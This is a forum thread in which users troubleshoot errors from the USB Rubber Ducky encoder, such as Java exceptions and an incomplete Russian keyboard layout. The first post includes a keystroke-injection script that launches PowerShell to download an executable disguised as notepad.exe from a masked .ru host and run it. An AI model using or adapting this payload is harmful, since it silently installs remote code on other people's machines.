alexx Posted January 11, 2013 Posted January 11, 2013 (edited) hi can't solve this problem with encoder 2.2 , 1.2 Microsoft Windows [Version 6.2.9200] C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2>java -jar encoder.jar -i script.tx t Error with input file! Exception in thread "main" java.lang.NullPointerException at Encoder.main(Encoder.java:107) C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2>java -jar encoder.jar -i script.tx t -o inject.bin -l ru Error with input file! Exception in thread "main" java.lang.NullPointerException at Encoder.main(Encoder.java:107) C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2> input file: DELAY 2000 GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://****.ru/notepad.exe','%TEMP%\notepad.exe'); Start-Process "%TEMP%\notepad.exe" ENTER Trying to use online decoder & have troubles too. Edited February 6, 2013 by midnitesnake Corrected Formatting Quote
no42 Posted January 11, 2013 Posted January 11, 2013 Make sure there are no spaces at the end of the line. I get, the following: Char not found:ASCII_72 Char not found:ASCII_70 Char not found:ASCII_6F Char not found:ASCII_77 Char not found:ASCII_65 Char not found:ASCII_72 Char not found:ASCII_73 Char not found:ASCII_68 Char not found:ASCII_65 This is because the ru.properties file is not finished, its just a start. Like the Italian keyboard post, you need to help build a working ru.properties file Quote
alexx Posted January 11, 2013 Author Posted January 11, 2013 (edited) in 1.2 version: C:\Program Files\Atmel\Flip 3.4.2\bin>java -jar duckencode.jar -i script.txt -o inject.bin Error with input file! Exception in thread "main" java.lang.reflect.InvocationTargetException at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoa der.java:58) Caused by: java.lang.NullPointerException at Encoder.main(Encoder.java:111) ... 5 more C:\Program Files\Atmel\Flip 3.4.2\bin> with the same input file, -L not used no spaces at the end, file fully correct Edited February 6, 2013 by midnitesnake Corrected Formatting Quote
alexx Posted January 11, 2013 Author Posted January 11, 2013 Thanks for all. Problem solved, input file needs to be .RTF format. Java latest... Quote
armyofangels Posted January 14, 2013 Posted January 14, 2013 Actually, it should work with txt payload as well… Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.